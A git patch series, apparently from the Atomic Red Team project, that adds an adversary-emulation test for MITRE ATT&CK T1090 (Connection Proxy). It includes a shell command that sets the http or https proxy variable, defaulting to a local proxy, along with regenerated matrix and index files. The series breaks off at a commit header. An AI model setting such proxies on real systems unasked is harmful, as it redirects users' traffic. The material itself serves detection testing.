From 2a1d1fd31b58ae19e60464fa88ce476e0358e45b Mon Sep 17 00:00:00 2001 From: Keith McCammon Date: Sun, 21 Oct 2018 11:31:17 -0600 Subject: [PATCH 1/5] macOS and Linux connection proxy test Configure basic connection proxy on macOS or Linux using http_proxy or https_proxy environment variables. --- atomics/T1090/T1090.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 atomics/T1090/T1090.yaml diff --git a/atomics/T1090/T1090.yaml b/atomics/T1090/T1090.yaml new file mode 100644 index 00000000..0829f135 --- /dev/null +++ b/atomics/T1090/T1090.yaml @@ -0,0 +1,34 @@ +--- +attack_technique: T1090 +display_name: Connection Proxy + +atomic_tests: +- name: Connection Proxy + description: | + Enable traffic redirection. + + To undo changes made by this test: + unset http_proxy + unset https_proxy + + Note that this test may conflict with pre-existing system configuration. + + supported_platforms: + - macos + - linux + + input_arguments: + proxy_server: + description: Proxy server URL (host:port) + type: url + default: 127.0.0.1:8080 + + proxy_scheme: + description: Protocol to proxy (http or https) + type: string + default: http + + executor: + name: sh + command: | + export #{proxy_scheme}_proxy=#{proxy_server} From 44ad3639a99f8b29d4f8ee9e7dbca30b2a18d27d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Sun, 21 Oct 2018 17:34:35 +0000 Subject: [PATCH 2/5] Generate docs from job=validate_atomics_generate_docs branch=t1090-proxy-redirection --- atomics/T1090/T1090.md | 50 +++++++++++++++++++++++ atomics/index.md | 3 +- atomics/index.yaml | 83 +++++++++++++++++++++++++++++++++++++++ atomics/linux-index.md | 3 +- atomics/linux-matrix.md | 2 +- atomics/macos-index.md | 3 +- atomics/macos-matrix.md | 2 +- atomics/matrix.md | 2 +- atomics/windows-index.md | 2 +- atomics/windows-matrix.md | 2 +- 10 files changed, 144 insertions(+), 8 deletions(-) create mode 100644 atomics/T1090/T1090.md diff --git a/atomics/T1090/T1090.md b/atomics/T1090/T1090.md new file mode 100644 index 00000000..a9fd73b0 --- /dev/null +++ b/atomics/T1090/T1090.md @@ -0,0 +1,50 @@ +# T1090 - Connection Proxy +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1090) +
A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) + +The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other. + +The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. + +Detection: Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious. + +Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) + +Platforms: Linux, macOS, Windows + +Data Sources: Process use of network, Process monitoring, Netflow/Enclave netflow, Packet capture + +Requires Network: Yes + +Contributors: Walker Johnson
+ +## Atomic Tests + +- [Atomic Test #1 - Connection Proxy](#atomic-test-1---connection-proxy) + + +
+ +## Atomic Test #1 - Connection Proxy +Enable traffic redirection. + +To undo changes made by this test: + unset http_proxy + unset https_proxy + +Note that this test may conflict with pre-existing system configuration. + +**Supported Platforms:** macOS, Linux + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080| +| proxy_scheme | Protocol to proxy (http or https) | string | http| + +#### Run it with `sh`! +``` +export #{proxy_scheme}_proxy=#{proxy_server} +``` +
diff --git a/atomics/index.md b/atomics/index.md index 837bfc9f..e31d76f4 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -620,7 +620,8 @@ # command-and-control - T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1090 Connection Proxy](./T1090/T1090.md) + - Atomic Test #1: Connection Proxy [macos, linux] - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1132 Data Encoding](./T1132/T1132.md) diff --git a/atomics/index.yaml b/atomics/index.yaml index 1ab8b19d..2378caf9 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -16877,6 +16877,89 @@ command-and-control: modified: '2018-04-18T17:59:24.739Z' type: attack-pattern atomic_tests: [] + T1090: + technique: + name: Connection Proxy + description: |- + A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) + + The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other. + + The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. + + Detection: Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious. + + Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) + + Platforms: Linux, macOS, Windows + + Data Sources: Process use of network, Process monitoring, Netflow/Enclave netflow, Packet capture + + Requires Network: Yes + + Contributors: Walker Johnson + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + external_references: + - url: https://attack.mitre.org/wiki/Technique/T1090 + source_name: mitre-attack + external_id: T1090 + - description: 'Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools + of the Trade. Retrieved December 2, 2015.' + source_name: Trend Micro APT Attack Tools + url: http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/ + - description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command + & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. + source_name: University of Birmingham C2 + url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:31:08.479Z' + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - Process use of network + - Process monitoring + - Netflow/Enclave netflow + - Packet capture + x_mitre_network_requirements: true + x_mitre_contributors: + - Walker Johnson + id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea + modified: '2018-04-18T17:59:24.739Z' + type: attack-pattern + identifier: T1090 + atomic_tests: + - name: Connection Proxy + description: | + Enable traffic redirection. + + To undo changes made by this test: + unset http_proxy + unset https_proxy + + Note that this test may conflict with pre-existing system configuration. + supported_platforms: + - macos + - linux + input_arguments: + proxy_server: + description: Proxy server URL (host:port) + type: url + default: 127.0.0.1:8080 + proxy_scheme: + description: Protocol to proxy (http or https) + type: string + default: http + executor: + name: sh + command: 'export #{proxy_scheme}_proxy=#{proxy_server} + +' T1132: technique: name: Data Encoding diff --git a/atomics/linux-index.md b/atomics/linux-index.md index 392916eb..cd4dcb71 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md @@ -193,7 +193,8 @@ # command-and-control - T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1090 Connection Proxy](./T1090/T1090.md) + - Atomic Test #1: Connection Proxy [macos, linux] - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1132 Data Encoding](./T1132/T1132.md) diff --git a/atomics/linux-matrix.md b/atomics/linux-matrix.md index 0a154d84..eda75b47 100644 --- a/atomics/linux-matrix.md +++ b/atomics/linux-matrix.md @@ -3,7 +3,7 @@ |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Bash History](./T1139/T1139.md) | [Account Discovery](./T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](./T1055/T1055.md) | [Clear Command History](./T1146/T1146.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | [Setuid and Setgid](./T1166/T1166.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Remote File Copy](./T1105/T1105.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | [Setuid and Setgid](./T1166/T1166.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Remote File Copy](./T1105/T1105.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) | | [Spearphishing Attachment](./T1193/T1193.md) | [Local Job Scheduling](./T1168/T1168.md) | [Create Account](./T1136/T1136.md) | [Sudo](./T1169/T1169.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](./T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](./T1064/T1064.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Sudo Caching](./T1206/T1206.md) | [File Deletion](./T1107/T1107.md) | [Input Capture](./T1056/T1056.md) | [Password Policy Discovery](./T1201/T1201.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](./T1153/T1153.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](./T1148/T1148.md) | [Network Sniffing](./T1040/T1040.md) | [Permission Groups Discovery](./T1069/T1069.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) | diff --git a/atomics/macos-index.md b/atomics/macos-index.md index 0fcb3e78..46850fe6 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md @@ -235,7 +235,8 @@ # command-and-control - T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1090 Connection Proxy](./T1090/T1090.md) + - Atomic Test #1: Connection Proxy [macos, linux] - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1132 Data Encoding](./T1132/T1132.md) diff --git a/atomics/macos-matrix.md b/atomics/macos-matrix.md index 5f460d02..5ec53e51 100644 --- a/atomics/macos-matrix.md +++ b/atomics/macos-matrix.md @@ -3,7 +3,7 @@ |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](./T1155/T1155.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Bash History](./T1139/T1139.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](./T1155/T1155.md) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [Browser Extensions](./T1176/T1176.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](./T1146/T1146.md) | [Brute Force](./T1110/T1110.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) | | [Spearphishing Attachment](./T1193/T1193.md) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](./T1150/T1150.md) | [Disabling Security Tools](./T1089/T1089.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](./T1152/T1152.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Process Injection](./T1055/T1055.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | [Network Service Scanning](./T1046/T1046.md) | [Remote File Copy](./T1105/T1105.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Job Scheduling](./T1168/T1168.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | [File Deletion](./T1107/T1107.md) | [Input Prompt](./T1141/T1141.md) | [Network Share Discovery](./T1135/T1135.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) | diff --git a/atomics/matrix.md b/atomics/matrix.md index c738f0e5..1961a020 100644 --- a/atomics/matrix.md +++ b/atomics/matrix.md @@ -3,7 +3,7 @@ |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](./T1155/T1155.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](./T1155/T1155.md) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Bash History](./T1139/T1139.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) | | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Spearphishing Attachment](./T1193/T1193.md) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Files](./T1081/T1081.md) | [Network Service Scanning](./T1046/T1046.md) | [Logon Scripts](./T1037/T1037.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](./T1088/T1088.md) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Share Discovery](./T1135/T1135.md) | [Pass the Hash](./T1075/T1075.md) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) | diff --git a/atomics/windows-index.md b/atomics/windows-index.md index a767df04..372264d3 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -443,7 +443,7 @@ # command-and-control - T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1090 Connection Proxy](./T1090/T1090.md) - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1132 Data Encoding](./T1132/T1132.md) diff --git a/atomics/windows-matrix.md b/atomics/windows-matrix.md index 097ca128..304619ed 100644 --- a/atomics/windows-matrix.md +++ b/atomics/windows-matrix.md @@ -3,7 +3,7 @@ |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Brute Force](./T1110/T1110.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) | | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Spearphishing Attachment](./T1193/T1193.md) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Service Scanning](./T1046/T1046.md) | [Pass the Hash](./T1075/T1075.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | [Bypass User Account Control](./T1088/T1088.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) | From 16a9e95f1601cf7fb3bd9396bd2c6cac52e98ebd Mon Sep 17 00:00:00 2001 From: Brian Beyer Date: Fri, 26 Oct 2018 15:00:21 -0600 Subject: [PATCH 3/5] Don't validate the template because of todos --- bin/validate-atomics.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/bin/validate-atomics.rb b/bin/validate-atomics.rb index 7dadae9f..f22f9788 100755 --- a/bin/validate-atomics.rb +++ b/bin/validate-atomics.rb @@ -9,7 +9,7 @@ ATOMIC_TEST_TEMPLATE = "#{File.dirname(File.dirname(__FILE__))}/atomic_red_team/ oks = [] fails = [] -(ATOMIC_RED_TEAM.atomic_test_paths + [ATOMIC_TEST_TEMPLATE]).each do |path| +ATOMIC_RED_TEAM.atomic_test_paths.each do |path| begin print "Validating #{path}..." YAML.load_file(path) From 7bc7660f4f6d372838e37168ad3952ea9bac5ee5 Mon Sep 17 00:00:00 2001 From: Michael Haag Date: Fri, 2 Nov 2018 14:17:39 -0600 Subject: [PATCH 4/5] Discovery.bat Update 